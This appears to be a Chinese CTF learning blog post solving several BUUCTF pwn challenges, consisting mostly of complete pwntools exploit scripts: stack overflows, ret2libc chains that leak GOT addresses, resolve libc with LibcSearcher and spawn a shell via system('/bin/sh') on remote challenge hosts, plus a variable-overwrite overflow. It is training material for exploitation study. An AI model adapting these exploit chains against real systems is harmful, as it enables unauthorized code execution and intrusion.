【pwn学习】buuctf pwn题目(二)

下班了继续做

level0

先checksec一下




很简单的道理：vulner函数里面存在漏洞，call到callsystem就好了



就覆盖0x80个就好了

算了，之后这种简单题就直接给payload吧

ciscn_2019_c_1

这道题看了源码是逆向加pwn
逆向完就很简单了
就直接ret2libc
因为是64位所以需要找一下gadget
直接贴代码吧

#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # echo every byte exchanged with the target; noisy but handy while developing
context.terminal = ['gnome-terminal','-x','bash','-c']  # dead assignment: overridden on the next line
context.terminal = ['tmux','splitw','-h']  # gdb.attach() opens its window as a tmux split
context.arch = 'amd64'  # flat() sizes packed integers from this (8 bytes for amd64)

local = 0  # 0: talk to the remote challenge instance; 1: spawn the binary locally under pwntools

if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 29644)
    bin1 = ELF('./ciscn_2019_c_1')  # local copy, used only for its PLT/GOT symbol addresses

def z(a=''):
    """Attach gdb to the running target when debugging locally.

    a: command script handed to gdb.attach (e.g. breakpoints followed by
       'c').  With an empty script the function blocks on Enter so that
       breakpoints can be placed by hand before the exploit continues.
    Does nothing when ``local`` is false (remote target).
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83 # pop rdi ; ret  -- gadget that loads the first SysV argument register
main_addr = 0x0400B28  # re-enter main after the leak so the overflow can be triggered a second time
cn.sendline('1')  # menu option; the prompt that follows ends with 'encrypted\n'
cn.recvuntil('encrypted\n')

# Stage 1: overflow the input buffer and return into puts(puts@got) to leak
# the runtime address of puts, then return to main.  The 0x50 bytes of padding
# plus the 8-byte 0 presumably cover the local buffer and the saved rbp —
# confirm against the stack layout in the disassembly.  A stack canary would
# abort before the return address is reached, and PIE would randomise the
# hard-coded pop_rdi/main_addr values; the chain relies on both being absent.
payload = flat(
        'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
    )

cn.sendline(payload)
cn.recvuntil('O\n')  # skip the program's own output up to the line before the leak
# puts prints the pointer as raw bytes up to the first NUL; a canonical
# user-space address has zero high bytes, so the short value is right-padded
# with NULs to a full 8-byte little-endian quantity for u64.
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

# Resolve the remote libc build from the leaked puts address (LibcSearcher
# presumably matches on the ASLR-invariant low bits) and derive the absolute
# addresses of system and the "/bin/sh" string.
libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')

# Stage 2: same overflow, now chaining system("/bin/sh").  0x0400B27 is one
# byte below main_addr and is presumably a lone `ret` used to keep the stack
# 16-byte aligned before entering system — confirm in the disassembly.
payload = flat(
        'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
    )

cn.sendline(payload)

cn.interactive()

babyrop

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
#p=process("./babyrop")
p=remote('node3.buuoj.cn', 26990)  # remote instance; the commented-out process() line above is the local variant


elf=ELF("./babyrop")  # local copy, used only for PLT/GOT symbol lookup

#gdb.attach(p)
# First input: satisfies the program's check so it prints "Correct".  The
# leading NUL presumably makes a string comparison succeed on an empty string,
# and the trailing 0xff byte presumably becomes the length of the next read —
# both inferred from the 0x25/0x2c offsets, confirm against the disassembly.
payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")


write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x08048825  # return here after the leak to obtain a second overflow


# Stage 1 (32-bit cdecl): 0xE7 bytes of padding, then 0xdeadbeef (presumably the
# saved ebp slot), then write(1, write@got, 4) with main as write's return
# address.  This leaks the runtime address of write and restarts the program.
payload="a"*0xE7+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)


p.sendline(payload)


write_addr=u32(p.recv(4))  # the 4 bytes written by write(1, write@got, 4)
print "write_addris "+hex(write_addr)  # Python 2 print statement: this script needs Python 2


# Resolve the remote libc build from the leaked write address and derive the
# absolute addresses of system and the "/bin/sh" string.
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")


print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(str_bin_sh)


# Second round: pass the check again, then overflow with system("/bin/sh")
# (cdecl: callee, its return address = main, then the single argument).
payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")
payload="a"*0xE7+p32(0xdeadbeef)+p32(system_addr)+p32(main_addr)+p32(str_bin_sh)


p.sendline(payload)
p.interactive()

ciscn_2019_n_1


关键函数好像栈溢出，覆盖成这个就好了
没试过小数



值就存储在这个位置，所以只要盖成这个就好了


#coding=utf8
from pwn import *
context.log_level = 'debug'  # echo every byte exchanged with the target
context.terminal = ['gnome-terminal','-x','bash','-c']  # dead assignment: overridden on the next line
context.terminal = ['tmux','splitw','-h']  # gdb.attach() opens its window as a tmux split
# NOTE(review): flat() packs integers per context.arch, so 'i386' yields the
# 4-byte value wanted below; the 0x4006A2 breakpoint used later looks like an
# amd64 text address, though — confirm the binary's bitness.
context.arch = 'i386'

local = 1  # 1: run and debug ./ciscn_2019_n_1 locally; 0: use the remote instance

if local:
    cn = process('./ciscn_2019_n_1')
    # bin = ELF('./task_shoppingCart',checksec=False)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    # libc = ELF('/lib/i386-linux-gnu/libc.so.6',checksec=False)

else:
    cn = remote('node3.buuoj.cn', 27179)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    pass


def z(a=''):
    """Local-only gdb hook: attach to ``cn`` with gdb script ``a``.

    When ``a`` is empty, wait for Enter so the debugger can be set up
    interactively first.  A no-op against the remote service.
    """
    if local:
        gdb.attach(cn, a)
        # no script given: pause so breakpoints can be set by hand
        wait_for_user = a == ''
        if wait_for_user:
            raw_input()

z('b*0x04006A2')  # local only: breakpoint address taken from the author's analysis
# system_addr = 0x08048F0E
# Overflow the 0x30-byte frame so that the variable presumably sitting 4 bytes
# above the buffer is overwritten — no return-address overwrite is involved,
# the payload ends at offset 0x30.  0x41348000 is the IEEE-754 single-precision
# bit pattern of 11.28125, presumably the value the program compares against;
# confirm with the disassembly.
payload = flat('A'*(0x30-0x4),0x41348000)

cn.sendline(payload)
cn.interactive()

ciscn_2019_en_2

一样的payload

#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'  # echo every byte exchanged with the target
context.terminal = ['gnome-terminal','-x','bash','-c']  # dead assignment: overridden on the next line
context.terminal = ['tmux','splitw','-h']  # gdb.attach() opens its window as a tmux split
context.arch = 'amd64'  # flat() sizes packed integers from this (8 bytes for amd64)

local = 0  # 0: remote instance; 1: local process under pwntools

if local:
    # NOTE(review): the local branch still loads the ciscn_2019_c_1 binary
    # (carried over from the previous script) while the remote branch uses
    # ciscn_2019_en_2.  The hard-coded gadget/main addresses below are the
    # same in both scripts, so the layouts are presumably identical — confirm
    # before relying on local runs.
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 26666)
    bin1 = ELF('./ciscn_2019_en_2')  # local copy, used only for PLT/GOT symbol lookup

def z(a=''):
    """Debug helper: attach gdb to the local process, optionally scripted.

    a: gdb commands to run on attach; '' means attach and then block on
       Enter so the debugger can be driven by hand.
    Skipped entirely when ``local`` is 0.
    """
    if not local:
        return
    gdb.attach(cn, a)
    needs_pause = (a == '')
    if needs_pause:
        raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83 # pop rdi ; ret  -- gadget that loads the first SysV argument register
main_addr = 0x0400B28  # re-enter main after the leak so the overflow can be triggered again
cn.sendline('1')  # menu option; the prompt that follows ends with 'encrypted\n'
cn.recvuntil('encrypted\n')

# Stage 1: overflow the input buffer and return into puts(puts@got) to leak
# the runtime address of puts, then return to main.  The 0x50 bytes of padding
# plus the 8-byte 0 presumably cover the local buffer and the saved rbp —
# confirm against the stack layout.  The chain depends on the binary having
# neither a stack canary nor PIE: the former would abort before the return
# address is overwritten, the latter would randomise the hard-coded addresses.
payload = flat(
        'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
    )

cn.sendline(payload)
cn.recvuntil('L \n')  # this build prints a different line before the leak than ciscn_2019_c_1
# puts emits the pointer as raw bytes up to the first NUL; the short value is
# right-padded with NULs to 8 bytes so u64 can decode it.
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

# Resolve the remote libc build from the leaked puts address and derive the
# absolute addresses of system and the "/bin/sh" string.
libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')

# Stage 2: same overflow, now chaining system("/bin/sh").  0x0400B27 is one
# byte below main_addr and is presumably a lone `ret` inserted for 16-byte
# stack alignment before system — confirm in the disassembly.
payload = flat(
        'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
    )

cn.sendline(payload)

cn.interactive()